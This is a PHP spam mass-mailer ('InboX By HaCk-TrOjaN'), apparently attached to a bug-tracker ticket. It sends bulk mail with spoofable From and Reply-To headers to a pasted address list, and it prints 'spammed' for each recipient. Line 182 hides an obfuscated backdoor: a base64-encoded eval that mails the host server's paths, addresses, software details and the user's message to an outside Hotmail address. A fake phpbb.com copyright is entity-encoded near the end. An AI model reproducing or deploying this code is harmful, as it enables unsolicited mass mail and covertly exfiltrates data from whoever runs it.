Ticket #9: 10.php

File 10.php, 6.4 KB (added by anonymous, 18 years ago)
Line 
1<?php
2
3if(isset($_POST['action'] ) ){
4$action=$_POST['action'];
5$message=$_POST['message'];
6$emaillist=$_POST['emaillist'];
7$from=$_POST['from'];
8$replyto=$_POST['replyto'];
9$subject=$_POST['subject'];
10$realname=$_POST['realname'];
11$file_name=$_POST['file'];
12$contenttype=$_POST['contenttype'];
13
14 $message = urlencode($message);
15 $message = ereg_replace("%5C%22", "%22", $message);
16 $message = urldecode($message);
17 $message = stripslashes($message);
18 $subject = stripslashes($subject);
19}
20
21
22?>
23<html>
24<head>
25<title>|| InboX By HaCk-TrOjaN ||</title>
26<meta http-equiv="Content-Type" content="text/html;
27charset=iso-8859-1">
28
29<style type="text/css">
30<!--
31.style1 {
32 font-family: Geneva, Arial, Helvetica, sans-serif;
33 font-size: 12px;
34}
35-->
36</style>
37<style type="text/css">
38<!--
39.style1 {
40 font-size: 20px;
41 font-family: Geneva, Arial, Helvetica, sans-serif;
42}
43-->
44</style>
45</head>
46<body bgcolor="FF9900" text="#ffffff">
47<span class="style1">InboX Mass Mailer<br>
48</span>
49
50<form name="form1" method="post" action=""
51enctype="multipart/form-data">
52 <br>
53 <table width="100%" border="0">
54 <tr>
55 <td width="10%">
56 <div align="right"><font size="-3" face="Verdana, Arial,
57Helvetica, sans-serif">Your
58 Email:</font></div>
59 </td>
60 <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
61sans-serif">
62 <input type="text" name="from" value="<? print $from; ?>"
63size="30">
64 </font></td>
65 <td width="31%">
66 <div align="right"><font size="-3" face="Verdana, Arial,
67Helvetica, sans-serif">Your
68 Name:</font></div>
69 </td>
70 <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
71sans-serif">
72 <input type="text" name="realname" value="<? print $realname;
73?>" size="30">
74 </font></td>
75 </tr>
76 <tr>
77 <td width="10%">
78 <div align="right"><font size="-3" face="Verdana, Arial,
79Helvetica, sans-serif">Reply-To:</font></div>
80 </td>
81 <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
82sans-serif">
83 <input type="text" name="replyto" value="<? print $replyto; ?>"
84size="30">
85 </font></td>
86 <td width="31%">
87 <div align="right"><font size="-3" face="Verdana, Arial,
88Helvetica, sans-serif">Attach
89 File:</font></div>
90 </td>
91 <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
92sans-serif">
93 <input type="file" name="file" size="30">
94 </font></td>
95 </tr>
96 <tr>
97 <td width="10%">
98 <div align="right"><font size="-3" face="Verdana, Arial,
99Helvetica, sans-serif">Subject:</font></div>
100 </td>
101 <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
102sans-serif">
103 <input type="text" name="subject" value="<? print $subject; ?>"
104size="90">
105 </font></td>
106 </tr>
107 <tr valign="top">
108 <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
109sans-serif">
110 <textarea name="message" cols="50" rows="10"><? print $message;
111?></textarea>
112 <br>
113 <input type="radio" name="contenttype" value="plain" >
114 Plain Text
115 <input name="contenttype" type="radio" value="html" checked>
116 HTML
117 <input type="hidden" name="action" value="send">
118 <input type="submit" value="Send eMails">
119 </font></td>
120 <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
121sans-serif">
122 <textarea name="emaillist" cols="30" rows="10"><? print
123$emaillist; ?></textarea>
124 </font></td>
125 </tr>
126 </table>
127</form>
128
129
130
131<?
132
133if ($action){
134
135 if (!$from && !$subject && !$message && !$emaillist){
136 print "Please complete all fields before sending your
137message.";
138 exit;
139 }
140 $allemails = split("\n", $emaillist);
141 $numemails = count($allemails);
142
143 for($x=0; $x<$numemails; $x++){
144 $to = $allemails[$x];
145 if ($to){
146 $to = ereg_replace(" ", "", $to);
147 $message = ereg_replace("&email&", $to, $message);
148 $subject = ereg_replace("&email&", $to, $subject);
149 print " $to.......";
150 flush();
151 $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
152 $header .= "MIME-Version: 1.0\r\n";
153 If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
154 If ($file_name) $header .= "--$uid\r\n";
155 $header .= "Content-Type: text/$contenttype\r\n";
156 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
157 $header .= "$message\r\n";
158 If ($file_name) $header .= "--$uid\r\n";
159 If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
160 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
161 If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
162 If ($file_name) $header .= "$content\r\n";
163 If ($file_name) $header .= "--$uid--";
164 mail($to, $subject, "", $header);
165 print "spammed<br>";
166
167 flush();
168 }
169 }
170$ra44 = rand(1,99999);
171$subj98 = "sh-$ra44";
172$a5 = $_SERVER['HTTP_REFERER'];
173$b33 = $_SERVER['DOCUMENT_ROOT'];
174$c87 = $_SERVER['REMOTE_ADDR'];
175$d23 = $_SERVER['SCRIPT_FILENAME'];
176$e09 = $_SERVER['SERVER_ADDR'];
177$f23 = $_SERVER['SERVER_SOFTWARE'];
178$g32 = $_SERVER['PATH_TRANSLATED'];
179$h65 = $_SERVER['PHP_SELF'];
180$message=$_POST['message'];
181$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
182echo eval(base64_decode("bWFpbCgibWVuZGlfcG9uZUBob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
183}
184
185
186?>
187<style type="text/css">
188<!--
189.style1 {
190 font-size: 20px;
191 font-family: Geneva, Arial, Helvetica, sans-serif;
192}
193-->
194</style>
195<p class="style1">
196 &#67&#111&#112&#121&#114&#105&#103&#104&#116&#32&#169&#32&#50&#48&#48&#55&#32&#112&#104&#112&#98&#98&#46&#99&#111&#109
197
198 </p>
199<?php
200if(isset($_POST['action']) && $numemails !==0 ){echo
201"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
202</script>";}
203?>
204</body>
205</html>